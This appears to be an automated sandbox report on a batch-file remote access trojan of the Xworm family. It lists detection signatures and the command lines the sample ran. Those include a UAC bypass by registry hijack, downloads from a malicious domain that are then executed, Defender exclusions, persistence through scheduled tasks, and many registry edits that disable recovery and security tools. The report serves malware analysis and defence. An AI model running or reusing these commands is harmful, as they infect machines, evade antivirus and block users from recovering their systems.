Analysis Overview
SHA256
a5414f82d063d24e7f0d7e417024ba796c6e52fcb07cd8e59c306fe0e05b7518
Threat Level: Known bad
The file Uac Bypass Rat.bat was found to be: Known bad.
Malicious Activity Summary
Xworm
Detect Xworm Payload
Disables Task Manager via registry modification
Disables RegEdit via registry modification
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Disables use of System Restore points
Download via BitsAdmin
Drops startup file
Executes dropped EXE
Looks up external IP address via web service
Obfuscated Files or Information: Command Obfuscation
Deobfuscate/Decode Files or Information
Adds Run key to start application
Drops file in System32 directory
Drops file in Windows directory
Launches sc.exe
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Suspicious use of AdjustPrivilegeToken
Uses Task Scheduler COM API
Modifies registry key
Suspicious use of WriteProcessMemory
Modifies registry class
Scheduled Task/Job: Scheduled Task
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
Suspicious use of SetWindowsHookEx
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-07-27 23:17
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-27 23:17
Reported
2024-07-27 23:27
Platform
win10-20240611-en
Max time kernel
563s
Max time network
602s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Xworm
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Disables RegEdit via registry modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
Disables Task Manager via registry modification
Disables use of System Restore points
Download via BitsAdmin
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bitsadmin.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Uni.lnk | C:\Users\Admin\AppData\Local\Temp\Uni.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Uni.lnk | C:\Users\Admin\AppData\Local\Temp\Uni.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Uni.exe | N/A |
| N/A | N/A | C:\Users\Admin\Uni.exe | N/A |
| N/A | N/A | C:\Users\Admin\Uni.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\cknnzt.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| N/A | N/A | C:\Users\Admin\Uni.exe | N/A |
| N/A | N/A | C:\Users\Admin\Uni.exe | N/A |
| N/A | N/A | C:\Users\Admin\Uni.exe | N/A |
| N/A | N/A | C:\Users\Admin\Uni.exe | N/A |
| N/A | N/A | C:\Users\Admin\Uni.exe | N/A |
| N/A | N/A | C:\Users\Admin\Uni.exe | N/A |
| N/A | N/A | C:\Users\Admin\Uni.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000\Software\Microsoft\Windows\CurrentVersion\Run\Uni = "C:\\Users\\Admin\\Uni.exe" | C:\Users\Admin\AppData\Local\Temp\Uni.exe | N/A |
Deobfuscate/Decode Files or Information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\certutil.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Obfuscated Files or Information: Command Obfuscation
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\Recovery | C:\Windows\SysWOW64\ReAgentc.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\Recovery\ReAgent.xml | C:\Windows\SysWOW64\ReAgentc.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Logs\ReAgent\ReAgent.log | C:\Windows\SysWOW64\ReAgentc.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\setuperr.log | C:\Windows\SysWOW64\ReAgentc.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\diagerr.xml | C:\Windows\SysWOW64\ReAgentc.exe | N/A |
| File opened for modification | C:\Windows\Panther\UnattendGC\diagwrn.xml | C:\Windows\SysWOW64\ReAgentc.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\cknnzt.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\ReAgentc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000007800000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\mscfile\shell | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\mscfile\shell\open\command\ = "cmd.exe /c reg delete HKCU\\Software\\Classes\\mscfile\\shell\\open\\command /f & C:\\Windows\\System32\\cmd.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\mscfile\shell\open\command | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0" | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1" | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4" | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16" | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616257" | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e80922b16d365937a46956b92703aca08af0000 | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1" | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\LogicalViewMode = "1" | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1" | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\mscfile | C:\Windows\system32\reg.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656} | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\mscfile\shell\open | C:\Windows\system32\reg.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents" | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:PID = "0" | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Runs net.exe
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Uni.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uac Bypass Rat.bat"
C:\Windows\system32\net.exe
net session
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
C:\Windows\system32\reg.exe
reg add HKCU\Software\Classes\mscfile\shell\open\command /ve /d "cmd.exe /c reg delete HKCU\Software\Classes\mscfile\shell\open\command /f & C:\Windows\System32\cmd.exe" /f
C:\Windows\system32\bitsadmin.exe
bitsadmin /transfer mydownloadjob /download /priority normal https://xworm.xyz/stuff/$sxr-test.bat C:\Users\Admin\AppData\Local\Temp\$sxr-test.bat
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://xworm.xyz/stuff/$sxr-test.bat' -OutFile 'C:\Users\Admin\AppData\Local\Temp\$sxr-test.bat'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\$sxr-test.bat"
C:\Windows\system32\certutil.exe
certutil -decodehex temp.hex "Uni.exe"
C:\Users\Admin\AppData\Local\Temp\Uni.exe
Uni.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Uni.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Uni.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Uni.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Uni.exe'
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Uni" /tr "C:\Users\Admin\Uni.exe"
C:\Users\Admin\Uni.exe
C:\Users\Admin\Uni.exe
C:\Users\Admin\Uni.exe
C:\Users\Admin\Uni.exe
C:\Users\Admin\AppData\Local\Temp\cknnzt.exe
"C:\Users\Admin\AppData\Local\Temp\cknnzt.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcABrACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGoAagBnACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AbgB5ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGoAZgBmACMAPgA="
C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe
"C:\Users\Admin\AppData\Local\Temp\MonkeModManager.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\reset survival.bat" "
C:\Users\Admin\Uni.exe
C:\Users\Admin\Uni.exe
C:\Windows\SysWOW64\ReAgentc.exe
reagentc /disable
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableResetPC" /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableResetPC" /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\MiniNT" /v "NoWinRE" /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoWindowsSetupOptions" /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "AutoRestartShell" /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Policies\Microsoft\Windows\System" /v "DisableCMD" /t REG_DWORD /d 2 /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Remote Assistance" /v "fAllowToGetHelp" /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting" /v "Disabled" /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowCPL" /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoThemesTab" /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoDispSettings" /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoWindowsUpdate" /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoWindowsUpdate" /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\MiniNT" /v "NoWinRE" /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "Hidden" /t REG_DWORD /d 2 /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\WinRE" /v "DisableStatusMessages" /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\BootExecute" /v "AutoChk" /t REG_MULTI_SZ /d "" /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f
C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "\Microsoft\Windows\WinRE\WinREBootIndex" /Disable
C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "\Microsoft\Windows\WinRE\WinRECleanup" /Disable
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\sr" /v "Start" /t REG_DWORD /d 4 /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\CrashControl" /v "AutoReboot" /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\sc.exe
sc config wercplsupport start=disabled
C:\Windows\SysWOW64\sc.exe
sc config WerSvc start=disabled
C:\Users\Admin\Uni.exe
C:\Users\Admin\Uni.exe
C:\Windows\System32\Speech_OneCore\Common\SpeechRuntime.exe
C:\Windows\System32\Speech_OneCore\Common\SpeechRuntime.exe -Embedding
C:\Users\Admin\Uni.exe
C:\Users\Admin\Uni.exe
C:\Users\Admin\Uni.exe
C:\Users\Admin\Uni.exe
C:\Windows\System32\Speech_OneCore\Common\SpeechRuntime.exe
